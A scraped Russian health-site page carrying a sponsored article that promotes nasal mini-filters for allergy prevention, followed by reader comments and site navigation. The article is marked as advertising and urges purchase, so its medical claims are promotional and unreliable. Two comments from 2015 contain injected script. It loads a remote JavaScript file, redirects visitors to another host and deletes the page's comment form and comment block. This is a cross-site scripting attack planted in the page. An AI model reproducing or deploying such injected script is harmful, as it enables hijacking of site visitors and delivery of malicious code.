Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Фильтр в нос и пройдет......  >>  Фильтр в нос и пройдет... Аллергия! Новый метод профилактики аллергии набирает обороты!
 
Обратная связь
 

Фильтр в нос и пройдет... Аллергия! Новый метод профилактики аллергии набирает обороты!

Размер шрифта
15 апреля 2014 00:00
  • google_analytics: false
  • Нравится

Ученые нашли необычный способ помочь 500 миллионам людей, страдающим от сезонной аллергии: миниатюрные фильтры в нос уменьшают воздействие аллергенов на дыхательные пути. И это изобретение уже есть в России!

Фильтр в нос и пройдет... Аллергия! Новый метод профилактики аллергии набирает обороты!

В ходе клинического исследования, проводившегося на базе Орхусского университета (Дания), выяснилось, мини-фильтр (респираторы-невидимки) намного эффективнее борются с симптомами аллергии, чем плацебо.

Принцип действия этих респираторов-невидимок состоит в следующем: будучи помещенным в ноздри, он не пропускает микрочастицы, которые попадают в дыхательные пути и вызывают аллергию. В первую очередь речь идет о частицах растительного происхождения (пыльца, чешуйки и так далее), которые являются основной причиной развития сезонного поллиноза у миллионов людей.

«В ближайшем будущем мы планируем исследовать фильтры в нос на большей выборке. Но предварительные результаты однозначно свидетельствуют в пользу того, что фильтр эффективно уменьшает аллергологическую симптоматику и при этом абсолютно комфортен в использовании», – рассказывает профессор Торбен Сигсгаард, глава исследования.

Одной из важнейших задач, которая стояла перед учеными, стал поиск ответа на вопрос: затрудняет ли фильтр носовое дыхание?

«Дыхание через рот является не физиологичным: микрочастицы, попадающие на слизистую глотки, могут вызывать ее раздражение и воспаление; таким образом, вместо ожидаемого глобального улучшения ЛОР-самочувствия применение микро-фильтра могло бы лишь усугубить патологический процесс в горле», – поясняют авторы.

Но опасения специалистов не подтвердились. Испытуемые вполне спокойно дышали носом, что, напротив, лишь самым положительным образом сказывалось на состоянии глотки: снижение интенсивности локальной воспалительной реакции отмечалось у 75% испытуемых из экспериментальной группы.

Мы часто получаем новости из западных стран об открытиях, которые спасают жизни простым людям! С радостью сообщаем, что это не тот случай! Вы можете купить эти мини-фильтры (респираторы-невидимки) уже сейчас и дышать спокойно!

Результаты этой научной работы были опубликованы в журнале Journal of Allergy and Clinical Immunology.

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:42

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
3 чудовищных заблуждения об аллергии   Грипп и ОРВИ у детей-аллергиков. Как помочь ребенку?   Диаскинтест – инновационная диагностика туберкулезной инфекции   Инновационный Диаскинтест заменил пробу манту  
08 октября 2012Диагноз «рак легких» ставят по дыханию! 13 октября 2011Арахис больше не опасен для аллергиков
 
21 июня 2013Хочешь, чтобы у твоего ребенка не было аллергии, – пососи его соску! 09 июня 2012Дети, проживающие в сельской местности, реже страдают аллергией
 

Слайдшоу

1
Вся правда об аллергии
Самые простые способы избавиться от аллергии
Как избавиться от аллергии без лекарств? Часть 1

Тесты

1
Контрольная по носу
Как контролировать бронхиальную астму у детей
Как контролировать бронхиальную астму
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.